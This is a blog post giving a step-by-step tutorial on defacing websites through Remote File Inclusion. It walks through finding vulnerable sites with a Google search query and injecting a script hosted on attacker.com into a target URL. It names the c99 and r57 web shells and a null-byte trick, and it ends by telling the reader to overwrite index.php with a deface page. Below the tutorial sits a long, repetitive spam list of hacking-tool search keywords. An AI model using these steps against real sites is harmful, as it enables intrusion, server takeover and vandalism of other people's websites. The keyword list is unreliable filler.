quinta-feira, 1 de junho de 2023

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

HOW TO DEFACE A WEBSITE USING REMOTE FILE INCLUSION (RFI)?

Remote File Inclusion (RFI) is a technique that allows the attacker to upload a malicious code or file on a website or server. The vulnerability exploits the different sort of validation checks in a website and can lead to code execution on server or code execution on the website. This time, I will be writing a simple tutorial on Remote File Inclusion and by the end of the tutorial, I suppose you will know what it is all about and may be able to deploy an attack.
RFI is a common vulnerability. All the website hacking is not exactly about SQL injection. Using RFI you can literally deface the websites, get access to the server and play almost anything with the server. Why it put a red alert to the websites, just because of that you only need to have your common sense and basic knowledge of PHP to execute malicious code. BASH might come handy as most of the servers today are hosted on Linux.

SO, HOW TO HACK A WEBSITE OR SERVER WITH RFI?

First of all, we need to find out an RFI vulnerable website. Let's see how we can find one.
As we know finding a vulnerability is the first step to hack a website or server. So, let's get started and simply go to Google and search for the following query.
inurl: "index.php?page=home"
At the place of home, you can also try some other pages like products, gallery and etc.
If you already a know RFI vulnerable website, then you don't need to find it through Google.
Once we have found it, let's move on to the next step. Let's see we have a following RFI vulnerable website.
http://target.com/index.php?page=home
As you can see, this website pulls documents stored in text format from the server and renders them as web pages. Now we can use PHP include function to pull them out. Let's see how it works.
http://target.com/index.php?page=http://attacker.com/maliciousScript.txt
I have included my malicious code txt URL at the place of home. You can use any shell for malicious scripts like c99, r57 or any other.
Now, if it's a really vulnerable website, then there would be 3 things that can happen.
  1. You might have noticed that the URL consisted of "page=home" had no extension, but I have included an extension in my URL, hence the site may give an error like 'failure to include maliciousScript.txt', this might happen as the site may be automatically adding the .txt extension to the pages stored in server.
  2. In case, it automatically appends something in the lines of .php then we have to use a null byte '' in order to avoid error.
  3. Successful execution.
As we get the successful execution of the code, we're good to go with the shell. Now we'll browse the shell for index.php. And will replace the file with our deface page.
Related word
  1. Hacking Tools Windows
  2. Hacker Tools Free Download
  3. How To Hack
  4. Hackers Toolbox
  5. Hacker Tools For Pc
  6. Pentest Tools Website
  7. Kik Hack Tools
  8. Pentest Tools Github
  9. Tools 4 Hack
  10. Hack Tools Download
  11. Hacking Tools For Mac
  12. Hacker Tools Linux
  13. Usb Pentest Tools
  14. Hacking Tools For Windows 7
  15. How To Make Hacking Tools
  16. Wifi Hacker Tools For Windows
  17. Usb Pentest Tools
  18. Hacking Tools Download
  19. Pentest Tools Website Vulnerability
  20. Android Hack Tools Github
  21. Hack Tools Pc
  22. Hack Apps
  23. Hacker Tools Apk
  24. Pentest Tools Website Vulnerability
  25. Hacking Tools For Windows
  26. Pentest Tools Bluekeep
  27. Pentest Tools Nmap
  28. Usb Pentest Tools
  29. Tools Used For Hacking
  30. Hacking Tools For Beginners
  31. Hack Website Online Tool
  32. Hacking Tools Usb
  33. Hacker Tools For Windows
  34. Hacking App
  35. Hacks And Tools
  36. Hacker Tools Apk
  37. Blackhat Hacker Tools
  38. Hack Tools For Pc
  39. Hacking Tools Mac
  40. Hacker Tools Apk Download
  41. Pentest Tools Bluekeep
  42. Hacking Tools Name
  43. New Hacker Tools
  44. Android Hack Tools Github
  45. Game Hacking
  46. Pentest Tools
  47. Hacking Tools For Kali Linux
  48. Nsa Hacker Tools
  49. Hacking Tools Name
  50. Wifi Hacker Tools For Windows
  51. Pentest Box Tools Download
  52. Nsa Hack Tools Download
  53. Game Hacking
  54. Hack Tools Pc
  55. Hacking Tools Mac
  56. Hacker Tools Free Download
  57. Hack Tools Download
  58. Pentest Tools List
  59. Hack Tools
  60. Hacker Tool Kit
  61. Hack Tools For Ubuntu
  62. Hacking Tools Github
  63. Game Hacking
  64. Hacking Tools Windows 10
  65. Hacker Hardware Tools
  66. Easy Hack Tools
  67. World No 1 Hacker Software
  68. Black Hat Hacker Tools
  69. Hacker Tools Linux
  70. Hack Tools For Windows
  71. Best Pentesting Tools 2018
  72. Hacker Tools For Pc
  73. New Hacker Tools
  74. Hacking Tools 2020
  75. Hacking Tools Hardware
  76. Hacker
  77. Hacking Tools For Kali Linux
  78. World No 1 Hacker Software
  79. Hacking App
  80. Hack Tools Pc
  81. Physical Pentest Tools
  82. Hack Tools Mac
  83. Hacking Tools For Windows
  84. Hacking Tools 2019
  85. Hacking Tools For Kali Linux
  86. Physical Pentest Tools
  87. Pentest Tools Github
  88. Top Pentest Tools
  89. Hacker Tools Windows
  90. Hacking Tools For Games
  91. Hack Tools For Ubuntu
  92. Pentest Tools Alternative
  93. Pentest Reporting Tools
  94. Pentest Tools For Windows
  95. Pentest Tools For Android
  96. Pentest Tools For Ubuntu
  97. Hacker Tools Windows
  98. Hack Apps
  99. Pentest Tools List
  100. Hacking Tools And Software
  101. Tools For Hacker
  102. Bluetooth Hacking Tools Kali
  103. Hacker Tools 2020
  104. Pentest Tools For Ubuntu
  105. Pentest Tools Free
  106. Termux Hacking Tools 2019
  107. Hack Tools For Windows
  108. Pentest Tools Tcp Port Scanner
  109. Hackrf Tools
  110. Hacker Tools Linux
  111. Hacking Tools Usb
  112. Hack Tools
  113. Hack Tools For Ubuntu
  114. Hacker Tools List
  115. Hacking Tools Windows
  116. Pentest Tools Port Scanner
  117. Nsa Hack Tools Download
  118. Hacker Tools 2020
  119. Nsa Hacker Tools
  120. Hacker Techniques Tools And Incident Handling
  121. Hacker Tools For Mac
  122. Hacking Tools Download
  123. Hack Tools For Windows
  124. Hacker Search Tools
  125. Hack Tool Apk No Root
  126. Best Hacking Tools 2020
  127. Hacker Tools Github
  128. Hacking Tools Hardware
  129. Hacking App
  130. Hacking Tools For Windows 7
  131. Hack Tools Download
  132. Pentest Automation Tools
  133. Pentest Tools For Ubuntu
  134. Pentest Tools For Android
  135. Pentest Tools Linux
  136. Hacker Tools For Pc
  137. Hack Tools Mac
  138. New Hack Tools
  139. Hacker Tools List
  140. Pentest Tools Android
  141. Hacker Search Tools
  142. Nsa Hack Tools Download
  143. Tools Used For Hacking
  144. Pentest Tools Open Source
  145. Pentest Tools Url Fuzzer
  146. Hacking Tools For Mac
  147. Hacking Tools Pc
  148. Hacker Hardware Tools
  149. Hacker Tools Linux
  150. Hacker Tool Kit
  151. How To Make Hacking Tools
  152. Growth Hacker Tools
  153. Pentest Tools Nmap
  154. Pentest Tools Alternative
  155. Hak5 Tools
  156. Install Pentest Tools Ubuntu
  157. Hacker Tools Github
  158. Hacking Tools Free Download
  159. Hacking Tools 2020
  160. Hacking Tools For Windows Free Download
  161. Pentest Tools For Windows
  162. Hak5 Tools
  163. Hack Tools
  164. Hacker Tools 2019
Postado por Gabinete Regional 2010 / 2011 às 02:54

Nenhum comentário:

Postar um comentário

Assinar: Postar comentários (Atom)